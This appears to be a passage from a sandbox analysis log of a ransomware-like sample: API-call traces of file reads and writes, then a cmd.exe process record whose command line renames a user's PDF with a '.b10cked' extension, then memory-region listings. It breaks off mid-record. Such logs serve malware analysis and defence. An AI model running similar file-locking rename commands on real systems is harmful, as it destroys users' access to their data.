[0142.237] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] GetFileType (hFile=0x4c) returned 0x1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.238] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] GetFileType (hFile=0x4c) returned 0x1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] GetFileType (hFile=0x4c) returned 0x1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] GetFileType (hFile=0x4c) returned 0x1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] GetFileType (hFile=0x4c) returned 0x1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] GetFileType (hFile=0x4c) returned 0x1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] GetFileType (hFile=0x4c) returned 0x1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] GetFileType (hFile=0x4c) returned 0x1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] GetFileType (hFile=0x4c) returned 0x1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.239] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] GetFileType (hFile=0x4c) returned 0x1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] GetFileType (hFile=0x4c) returned 0x1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] GetFileType (hFile=0x4c) returned 0x1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] GetFileType (hFile=0x4c) returned 0x1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] GetFileType (hFile=0x4c) returned 0x1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] GetFileType (hFile=0x4c) returned 0x1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] GetFileType (hFile=0x4c) returned 0x1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] GetFileType (hFile=0x4c) returned 0x1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.240] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.240] GetFileType (hFile=0x4c) returned 0x1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] GetFileType (hFile=0x4c) returned 0x1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] GetFileType (hFile=0x4c) returned 0x1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] GetFileType (hFile=0x4c) returned 0x1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] GetFileType (hFile=0x4c) returned 0x1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] GetFileType (hFile=0x4c) returned 0x1 [0142.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] GetFileType (hFile=0x4c) returned 0x1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] GetFileType (hFile=0x4c) returned 0x1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.242] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] GetFileType (hFile=0x4c) returned 0x1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] GetFileType (hFile=0x4c) returned 0x1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] GetFileType (hFile=0x4c) returned 0x1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.242] GetFileType (hFile=0x4c) returned 0x1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] GetFileType (hFile=0x4c) returned 0x1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] GetFileType (hFile=0x4c) returned 0x1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] GetFileType (hFile=0x4c) returned 0x1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] GetFileType (hFile=0x4c) returned 0x1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.243] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.243] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] GetFileType (hFile=0x4c) returned 0x1 [0142.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.245] GetFileType (hFile=0x4c) returned 0x1 [0142.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.245] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.245] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x32, lpOverlapped=0x0) returned 1 [0142.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.245] GetFileType (hFile=0x4c) returned 0x1 [0142.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.245] GetFileType (hFile=0x4c) returned 0x1 [0142.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.245] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x32, lpOverlapped=0x0) returned 1 [0142.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.245] _close (_FileHandle=4) returned 0 [0142.245] FindNextFileW (in: hFindFile=0x350e90, lpFindFileData=0x26ef34 | out: lpFindFileData=0x26ef34) returned 0 [0142.246] GetLastError () returned 0x12 [0142.246] FindClose (in: hFindFile=0x350e90 | out: hFindFile=0x350e90) returned 1 [0142.246] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0142.247] _close (_FileHandle=3) returned 0 [0142.247] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.247] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.247] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.247] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.248] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.248] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.248] SetConsoleInputExeNameW () returned 0x1 [0142.248] GetConsoleOutputCP () returned 0x1b5 [0142.248] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.248] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.248] exit (_Code=0) Process: id = "173" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d00" os_pid = "0xdd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14998 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14999 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15000 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15001 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 15002 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15003 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15004 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15005 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15006 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 15007 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16022 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16023 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16024 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16025 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 16026 start_va = 0x7a0000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 16027 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16028 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16029 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16030 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16031 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16032 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16033 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16034 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16035 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16036 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16037 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16038 start_va = 